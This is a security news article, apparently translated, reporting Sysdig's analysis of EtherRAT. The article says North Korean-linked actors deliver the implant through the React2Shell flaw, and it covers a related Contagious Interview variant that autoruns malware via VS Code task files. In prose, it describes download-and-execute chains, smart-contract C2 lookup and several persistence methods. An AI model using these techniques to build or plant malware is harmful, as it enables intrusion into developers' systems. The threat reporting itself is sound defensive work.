North Korean-linked attackers may have become the latest attackers to exploit a recently disclosed critical security flaw in React2Shell in React Server Components (RSC) to deliver a previously undocumented remote access Trojan. EtherRAT.
“EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” Sysdig said in a report published Monday.
The cloud security company said this activity shows significant overlap with a long-running campaign codenamed “Contagious Interview,” which has been observed leveraging EtherHiding technology to distribute malware since February 2025.
Contagious Interview is the name given to a series of attacks that target blockchain and Web3 developers and others through fake job interviews, coding challenges, and video assessments, leading to the deployment of malware. These efforts typically begin with a ruse to lure victims through platforms like LinkedIn, Upwork, and Fiverr, where the threat actor poses as a recruiter offering lucrative job opportunities.
According to software supply chain security firm Socket, this is one of the most prolific campaigns exploiting the npm ecosystem, highlighting its ability to adapt to JavaScript and cryptocurrency-centric workflows.
The attack chain begins by exploiting RSC’s highest severity security vulnerability, CVE-2025-55182 (CVSS score: 10.0), by executing a Base64-encoded shell command that downloads and executes a shell script responsible for deploying the main JavaScript implant.
Shell scripts are obtained using the curl command, using wget and python3 as fallbacks. It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, and then writes an encrypted blob and an obfuscated JavaScript dropper to disk. Once all of these steps are complete, proceed to remove the shell script, minimize the forensic trail, and run the dropper.
The main purpose of the dropper is to decrypt the EtherRAT payload using a hardcoded key and generate it using the downloaded Node.js binary. The malware is notable for using EtherHiding to retrieve the C2 server URL from an Ethereum smart contract every five minutes, allowing operators to easily update the URL even if it is deleted.
“What makes this implementation unique is the use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints,” Sysdig said. “EtherRAT queries all nine endpoints in parallel, collects the responses, and selects the URLs returned from a large number of endpoints.”
“This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot manipulate rogue RPC nodes to disrupt C2 resolution.”
It is worth noting that similar implementations were previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to distribute downloader malware to developer systems.
Once EtherRAT establishes a connection with a C2 server, it enters a polling loop that runs every 500 milliseconds and interprets responses longer than 10 characters as JavaScript code that is executed on the infected machine. Persistence is achieved using five different methods.
- Systemd User Services
- XDG autostart entry
- Cron job
- .bashrc injection
- profile injection
Using multiple mechanisms, threat actors can ensure malware runs even after a system reboot, allowing continued access to infected systems. Another sign of the malware’s sophistication is its ability to self-update by submitting its own source code to an API endpoint and then overwriting itself with new code received from the C2 server.
It then launches a new process with the updated payload. It’s worth noting here that the C2 returns a functionally identical but different obfuscated version, potentially allowing it to bypass static signature-based detection.
In addition to the use of EtherHiding, the link to Contagious Interview stems from the overlap between the encrypted loader pattern used by EtherRAT and a known JavaScript information stealer and downloader named BeaverTail.
“EtherRAT represents a major evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft to persistent, stealth access designed for long-term operation,” Sysdig said.
“Whether this represents North Korean attackers pivoting to new exploitation vectors, or advanced technology borrowed by another threat actor, the result is the same: Defenders are faced with a difficult new implant that resists traditional detection and removal methods.”
Contagious Interview moved from npm to VS Code
This disclosure comes as OpenSourceMalware details a new Contagious Interview variant that prompts victims to clone a malicious repository on GitHub, GitLab, or Bitbucket and launch a project in Microsoft Visual Studio Code (VS Code) as part of a programming challenge.
This runs VS Code’s task.json file, which is configured with runOptions.runOn: ‘folderOpen’, and autoruns as soon as the project is opened. This file is designed to download the loader script using curl or wget based on the operating system of the compromised host.
For Linux, the next step is a shell script that downloads and runs another shell script named “vscode-bootstrap.sh”. Next, fetch two more files: “package.json” and “env-setup.js”. The latter acts as a launch pad for BeaverTail and InvisibleFerret.
OpenSourceMalware said it has identified 13 different versions of this campaign spread to 27 different GitHub users, as well as 11 different versions of BeaverTail. The oldest repository (‘github(.)com/MentarisHub121/TokenPresaleApp’) dates back to April 22, 2025, and the latest version (‘github(.)com/eferos93/test4’) was created on December 1, 2025.
The OpenSourceMalware team stated that “North Korean threat actors have flocked to Vercel and are now using it almost exclusively.” “For unknown reasons, Contagious Interview has stopped using Fly.io, Platform.sh, Render, and other hosting providers.”
